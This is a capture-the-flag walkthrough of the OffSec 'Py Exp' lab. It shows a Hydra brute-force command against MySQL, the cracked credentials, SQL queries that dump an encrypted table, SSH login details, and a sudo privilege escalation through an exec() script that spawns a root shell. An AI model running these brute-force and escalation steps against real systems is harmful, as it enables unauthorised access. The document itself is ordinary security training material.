Py Exp Walkthrough  offsec

Py Exp Walkthrough offsec

Room link https://portal.offsec.com/labs/play

Enumeration

I initiated an Rustscan scan and discovered open port.

PORT 80 is not open, so attack surface is drastically dropped for attackers.

MySQL service is running on port 3306. So let's do ENUMERATION on Mysql.

MYSQL BRUTE FORCE USING HYDRA.

hydra -l root -P /urs/share/wordlists/rockyou.txt mysql://192.168.160.118         

If using 'root' as the username was unsuccessful, our next step would be to attempt using 'admin' instead.

I got the password of the Mysql username root which is prettywomen.[root:prettywomen]

MYSQL ENUMERATION:

And login Mysql:

mysql -h 192.168.160.118 -u root -p 
show databases;        
use  data;
show tables;
select * from fernet;        

The data seemed to be base64 encoded, but when I tried to decode it, it yielded nothing. However, since I know that Fernet is a symmetric encryption mechanism, I used the key and ciphertext with an online decryptor and found a set of credentials.

I used the new credentials to access the SSH server.

username lucy: password wJ9`"Lemdv9[FEw-

ssh [email protected] -p 1337        

I got the flag in user.txt.

PRIVILEGE ESCALATION

i tired many different techniques was disappointed.

 cat /opt/exp.py        

uinput = raw_input('how are you?')

exec(uinput)

So, the plan is to run Python 2 with sudo to execute exp.py. Then, I will load a shell by adding import os; os.system("/bin/sh") to be executed by exp.py.

import pty;pty.spawn('/bin/bash')        

Thanks for visiting:



要查看或添加评论,请登录

Santosh Kumar的更多文章

  • Offensive Security So_Simple CTF Walkthrough

    Offensive Security So_Simple CTF Walkthrough

    Vrijanandan Kumar SANTOSH KUSHWAHA We scan the site with nmap. This shows two open port.

    1 条评论
  • CyberSploit1 | OffSec Writeup

    CyberSploit1 | OffSec Writeup

    Cybersploit-1 is a popular lab from Offensive Security (OffSec) designed to help users improve their penetration…

  • Different CTF from TryHackMe

    Different CTF from TryHackMe

    A Hard THM Challenge. Steganography, Database Handling, FTP, WordPress CMS, and Brute-Forcing.

  • Shakabrah Walkthrough OffSec

    Shakabrah Walkthrough OffSec

    In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide…

    1 条评论
  • TryHackMe- Kenobi-Walkthrough

    TryHackMe- Kenobi-Walkthrough

    SANTOSH KUSHWAHA Vrijanandan Kumar The "Kenobi" room on TryHackMe is an engaging challenge that guides you through the…

  • Wonderland -TryHackme Walkthrough

    Wonderland -TryHackme Walkthrough

    /SANTOSH KUSHWAHA Wonderland CTF link: TryHackMe | Wonderland The Wonderland challenge on TryHackMe is a cybersecurity…

  • Library - TryHackMe Walkthrough

    Library - TryHackMe Walkthrough

    Scan the machine:' We first find the list of services that are running on the machine. We use the below Rustscan…

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

  • Poster TryHacMe Walkthrough

    Poster TryHacMe Walkthrough

    SANTOSH KUSHWAHA The "Poster" room focuses on web application security, specifically SQL injection, directory…

    1 条评论
  • Seppuku offsec Walkthrough

    Seppuku offsec Walkthrough

    SANTOSH KUMAR The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to…

社区洞察

其他会员也浏览了